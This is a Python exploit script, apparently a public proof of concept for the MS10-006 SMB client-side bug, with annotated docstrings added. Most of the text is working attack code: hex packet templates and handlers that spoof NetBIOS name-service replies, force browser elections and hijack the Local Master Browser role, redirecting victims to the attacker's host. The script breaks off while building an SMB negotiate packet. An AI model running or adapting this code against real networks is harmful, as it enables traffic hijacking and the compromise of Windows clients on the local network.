Proof of Concept for MS10-006 SMB Client-Side Bug

# More Info: http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.html
import sys,SocketServer,socket,threading,time,random
from random import *
from time import sleep
from socket import *
  
# Command line: argv[1] is the address that gets written into the crafted
# packets, argv[2] is the broadcast address the datagrams are sent to.
if len(sys.argv)<=2
 sys.exit('Usage: pwn.py Your_ip Broadcast_ip\n\r Example: pwn.py 10.0.0.1 10.0.0.255')
  
ip = str(sys.argv[1])            # NOTE(review): the helpers below re-read sys.argv[1] themselves; this name does not appear to be used in the visible code
nbns = str(sys.argv[2]),137      # (broadcast address, UDP/137) -- NetBIOS name service endpoint
browser = str(sys.argv[2]),138   # (broadcast address, UDP/138) -- NetBIOS datagram (browser) endpoint
  
  
# Three-byte tails appended to the name field by nametid()/nametidrand()
# (see the `data[48:79]+service` slice assignment in those helpers).
elec = "\x42\x4f\x00"
domainmasterbro = "\x42\x4c\x00"
  
# Each template below is a list of one-character strings decoded from a hex
# dump.  The helpers copy a template (`packet[:]`) before patching it, so
# the lists themselves are never mutated in place.
  
##BROWSER election request
# Patched by nametid() and broadcast to `browser` from BROWSER.handle().
browserelect = [chr(int(a, 16)) for a in """
11 02 bd 82 c0 a8 00 96 00 8a 00 ae 00 00 20 46
47 45 4e 45 43 45 50 46 49 43 41 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 41 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 14 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 14 00 56 00 03 00 01
00 01 00 02 00 25 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 08 09 a8 0f 01 20 1b e9
a5 00 00 00 00 00 56 4d 42 4f 58 00""".split()]
  
##Local Master Announcement
# Patched by nametidrand() (with `elec`) and broadcast to `browser`.
browsermaster = [chr(int(a, 16)) for a in """
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0f 00 80 fc 0a 00 4d 41
53 54 45 52 00 00 00 00 00 00 00 00 00 00 00 06
2b 10 84 00 00 0f 01 55 aa 00""".split()]
  
# First datagram BROWSER.handle() sends; only the address bytes 4..8 are
# patched in (addipbrow()).
resetcache = [chr(int(a, 16)) for a in """
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46
43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41
42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0e 02""".split()]
  
# Second datagram BROWSER.handle() sends; identical to resetcache except for
# the final byte.  Also patched by addipbrow().
resetlbm = [chr(int(a, 16)) for a in """
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46
43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41
42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0e 01""".split()]
  
##Browser Master annoncement
# Patched by nametidrand() (with `domainmasterbro`); last datagram sent by
# BROWSER.handle().
masterannon = [chr(int(a, 16)) for a in """
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0d 4d 41 53 54 45 52 00""".split()]
  
# Sent to `nbns` (UDP/137) after addipnb() overwrites the last four bytes
# with the packed address from argv[1].
regmsbrowse = [chr(int(a, 16)) for a in """
be 6e 29 10 00 01 00 00 00 00 00 01 20 41 42 41
43 46 50 46 50 45 4e 46 44 45 43 46 43 45 50 46
48 46 44 45 46 46 50 46 50 41 43 41 42 00 00 20
00 01 c0 0c 00 20 00 01 00 04 93 e0 00 06 80 00
c0 a8 00 96""".split()]
  
##NBNS Spoofing
# Reply template used by NBNS.handle(); namenbnstid() copies the request's
# transaction id (bytes 0..2) and name bytes (12..48) into it before the
# packed argv[1] address is appended.
spoof = [chr(int(a, 16)) for a in """
08 f3 85 80 00 00 00 01 00 00 00 00 20 46 48 45
50 46 43 45 4c 45 48 46 43 45 50 46 46 46 41 43
41 43 41 43 41 43 41 43 41 43 41 42 4e 00 00 20
00 01 00 04 93 e0 00 06 00 00""".split()]
  
def nametid(data,packet,service):
    """Return a patched copy of *packet*, leaving *packet* itself untouched.

    Three fields are overwritten, in the order the original comments name
    them: bytes 2..4 get the transaction id found at data[2:4]; bytes 4..8
    get the packed IPv4 address taken from sys.argv[1]; bytes 48..82 get
    data[48:79] followed by *service* (the service/domain name field).
    """
    txid = data[2:4]
    our_addr = inet_aton(str(sys.argv[1]))
    name_field = data[48:79] + service

    patched = packet[:]
    patched[2:4] = txid
    patched[4:8] = our_addr
    patched[48:82] = name_field
    return patched
  
def nametidrand(data,packet,service):
    """Like nametid(), but with a generated transaction id.

    Bytes 2..4 of the copy become 0x80 followed by one uniformly random
    byte (random.choice over 0..255); bytes 4..8 get the packed IPv4
    address from sys.argv[1]; bytes 48..82 get data[48:79] + *service*.
    *packet* is copied, not modified.
    """
    txid = "\x80" + chr(choice(range(256)))
    our_addr = inet_aton(str(sys.argv[1]))
    name_field = data[48:79] + service

    patched = packet[:]
    patched[2:4] = txid
    patched[4:8] = our_addr
    patched[48:82] = name_field
    return patched
  
def addipbrow(packet):
    """Return a copy of *packet* whose bytes 4..8 hold the packed IPv4
    address given in sys.argv[1].  The input list is not modified."""
    our_addr = inet_aton(str(sys.argv[1]))
    patched = packet[:]
    patched[4:8] = our_addr
    return patched
  
def addipnb(packet):
    """Return a copy of *packet* whose last four elements are replaced by
    the packed IPv4 address given in sys.argv[1].  The input list is not
    modified; for inputs shorter than four elements the whole copy is
    replaced, as the original slice arithmetic did."""
    our_addr = inet_aton(str(sys.argv[1]))
    patched = packet[:]
    patched[-4:] = our_addr
    return patched
  
def sockbroad(packet,host):
    """Send *packet* once as a UDP datagram to the (address, port) pair *host*.

    SO_BROADCAST is enabled so that *host* may name a broadcast address.
    A fresh socket is created for every call and is not closed explicitly.
    """
    sock = socket(AF_INET,SOCK_DGRAM)
    sock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
    sock.sendto(packet,host)
  
class BROWSER(SocketServer.BaseRequestHandler):
    """Datagram handler for the browser endpoint (`browser`, UDP/138).

    handle() inspects one received datagram and, when payload byte 168
    matches one of the three values tested below, sends the module-level
    packet templates in the sequence the print statements narrate.
    Defensive note: the observable artefacts are the broadcasts to UDP/138
    and the registrations sent to UDP/137 that originate from a host other
    than the legitimate one; the vendor fix referenced in the file header
    is MS10-006.
    """
       
    def server_bind(self):
       # NOTE(review): BaseRequestHandler does not define a server_bind
       # hook; nothing visible in this file invokes this method.
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)
  
    def handle(self):
        """Process one datagram; self.request is unpacked as (payload, socket)."""
        ip = inet_aton(str(sys.argv[1]))   # not referenced below; the helpers re-read sys.argv[1]
        request, socket = self.request
        data = request
        print "From:", self.client_address
        # Payload byte 168 selects whether this datagram triggers the send sequence.
        if data[168] == "\x01" or data[168] == "\x0f" or data[168] == "\x08" and self.client_address[0] != sys.argv[1]:
  
           sockbroad(''.join(addipbrow(resetcache)),browser)
           print "[+]LMB cache Successfully Reseted"
  
           sockbroad(''.join(addipbrow(resetlbm)),browser)
           print "[+]LMB Successfully killed"
  
           # Four copies, 0.8 s apart, each carrying the request's transaction id.
           for x in range(4):
              sockbroad(''.join(nametid(data,browserelect, elec)),browser)
              sleep(0.8)
           print "[+] Election Won !\n"
  
           # Registration datagrams go to the name-service endpoint, not `browser`.
           for x in range(4):
              sleep(0.5)
              sockbroad(''.join(addipnb(regmsbrowse)),nbns)
           print "[+]Now Register __MSBROWSE__ :] "
                    
           sockbroad(''.join(nametidrand(data,browsermaster, elec)),browser)
           sleep(1)
           sockbroad(''.join(nametidrand(data,masterannon, domainmasterbro)),browser)
           print "[+] Now LBM ! \n"
  
#NBNS SPOOF;
  
def namenbnstid(data,packet):
    """Return a copy of *packet* carrying two fields from *data*:
    bytes 0..2 (transaction id) and bytes 12..48 (NetBIOS name).
    *packet* is not modified."""
    txid = data[0:2]
    nb_name = data[12:48]

    patched = packet[:]
    patched[0:2] = txid
    patched[12:48] = nb_name
    return patched
  
class NBNS(SocketServer.BaseRequestHandler):
    """Datagram handler for the name-service endpoint (`nbns`, UDP/137).

    handle() answers any received datagram whose bytes 2..4 equal
    0x01 0x10 with the `spoof` template, carrying the request's
    transaction id and name bytes (namenbnstid()) followed by the packed
    address from sys.argv[1].
    Defensive note: a name-service reply that arrives from a host which is
    not the expected responder, or that answers names the sender never
    registered, is the artefact to alert on; the exposure exists only
    where NetBIOS name resolution over UDP/137 is still in use.
    """
       
    def server_bind(self):
       # NOTE(review): BaseRequestHandler does not define a server_bind
       # hook; nothing visible in this file invokes this method.
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)
  
    def handle(self):
        """Process one datagram; self.request is unpacked as (payload, socket)."""
        request, socket = self.request
        data = request
        print "From:", self.client_address
        #Hijack
        # Only datagrams whose bytes 2..4 are 0x01 0x10 are answered; the reply
        # is sent unicast back to the requester's address.
        if data[2:4] == "\x01\x10":    
           buffer0 = ''.join(namenbnstid(data,spoof))+inet_aton(str(sys.argv[1]))
           socket.sendto(buffer0, self.client_address)
           print "Fake NBNS Response sended\n"
  
packetnego = (
##SMB Header
"\x00\x00\x00\x7f"                   #Netbios length
"\xff\x53\x4d\x42"                   #Server type
"\x72"                               #Operation/Command